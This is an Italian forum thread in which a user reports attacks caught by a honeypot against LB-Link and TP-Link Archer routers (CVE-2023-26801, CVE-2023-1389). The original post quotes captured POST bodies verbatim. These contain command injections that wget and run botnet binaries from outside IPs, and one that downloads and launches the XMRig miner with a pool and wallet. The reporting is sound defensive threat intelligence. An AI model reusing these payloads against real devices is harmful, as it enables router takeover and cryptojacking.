Discussione Threat recap - campagne di malware in azione Gennaio 2024

Netcat

Utente Jade
17 Gennaio 2022
445
128
328
691
Ultima modifica:
Oggi ho inaugurato il mio honeypot white hat sul mio server privato. L'honeypot impersona un sito web apparentemente innocente, ma che da dietro le quinte logga le seguenti attività:

  • Indirizzo IP dell'attaccante;
  • User-Agent;
  • Intercetta richieste GET, POST e CONNECT, leakando il corpo della risposta;
  • Leak del paese di provenienza dell'IP loggato.
Con queste info, ho potuto rilevare una campagna di malware diretta ai sistemi Unix, operata dai seguenti attori:

  1. 213.204.98.238 (confermato: https://www.abuseipdb.com/check/213.204.98.238) - Quest'IP ha laciato una richiesta POST al seguente endpoint "/goform/set_LimitClient_cfg" con il valore "cookie: user=admin" e il seguente corpo "time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;" - Avast segnala "http://103.245.236.152/huhu.mpsl" come URL:Botnet

  2. 165.232.161.92, 43.158.217.52, 104.248.199.117 e 80.82.77.202 (verificati su Abuseipdb) inviano pacchetti di richieste GET e POST contenenti dei testi malformati, per dossare il server.

  3. 45.94.4.157 (confermato: https://www.abuseipdb.com/check/45.94.4.157) - Quest'IP, similmente a 213.204.98.238, invia una richiesta POST a "/goform/set_LimitClient_cfg", ma stavolta il corpo della richiesta cambia leggermente, "time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://80.66.88.71/mipsel; chmod 777 mipsel; ./mipsel", specificando inoltre i parametri Accept-Encoding: gzip, Content-Lenght: 99, e User-Agent: t.me/DeltaApi. Anche in questo caso, Avast possiede delle signature sia per il payload ricevuto che per l'endpoint che lo sta distribuendo.
Potrebbero trattarsi di campagne di exploiting già attive da tempo, tuttavia il numero crescente di segnalazioni che questi IP stanno ricevendo nelle blacklist, ha portato i difensori a leakare le informazioni associate ad essi. Su AbusedIP vediamo ad esempio, come 80.82.77.202 abbia ricevuto quasi 4,000 segnalazioni. Tutti gli indirizzi IP presenti in questo thread sono associati ad OPSEC in fase di documentazione da parte dei ricercatori, e le loro informazioni sono già state leakate.

Spoiler: sono felice che il mio honeypot funzioni.

PS. E non poteva mancare Xmrig (il co****** ha indicato anche username e password nella POST request), da 212.113.120.128 (Russia, https://www.abuseipdb.com/check/212.113.120.128):
"operation=write&country=$(id>`wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xvf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0 && ./xmrig --url pool.hashvault.pro:80 --user 4BK7HuHpSCsH8XM9ZmbdUXcbtd6e2FKcF1QxmCcFyt7LXHjsWTFz8QAjJVfqUg1DR5LQKMGYMC8wXh7cXZLw2wXFVM4u7yt --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 && curl https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xvf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0 && ./xmrig --url pool.hashvault.pro:80 --user 4BK7HuHpSCsH8XM9ZmbdUXcbtd6e2FKcF1QxmCcFyt7LXHjsWTFz8QAjJVfqUg1DR5LQ"
 
Ottimo lavoro !
Ma quindi a che conclusione sei arrivato sugli Ip da te catturati ? Comuni Botnet ? Altro ?

Mi interessa una tua valutazione
 
Sono campagne di exploiting contro i rispettivi router LB-Link (a cui appartiene l'endpoint /goform/set_LimitClient_cfg), nel primo caso il parametro "mac" è affetto da errore di content validation, mentre la seconda è contro Archer TP-Link (ne ho uno anche io, ma non vulnerabile) dove si verifica un errore di validation del parametro "country", dimostrando la presenza di os command injection.

Sono state definite rispettivamente come CVE-2023-26801 e CVE-2023-1389.
 
Sono campagne di exploiting contro i rispettivi router LB-Link (a cui appartiene l'endpoint /goform/set_LimitClient_cfg), nel primo caso il parametro "mac" è affetto da errore di content validation, mentre la seconda è contro Archer TP-Link (ne ho uno anche io, ma non vulnerabile) dove si verifica un errore di validation del parametro "country", dimostrando la presenza di os command injection.

Sono state definite rispettivamente come CVE-2023-26801 e CVE-2023-1389.

X curiosità vulnerabilità da quanto presenti su in apparecchio come tplink? Chiedo perché ne utilizzo anche io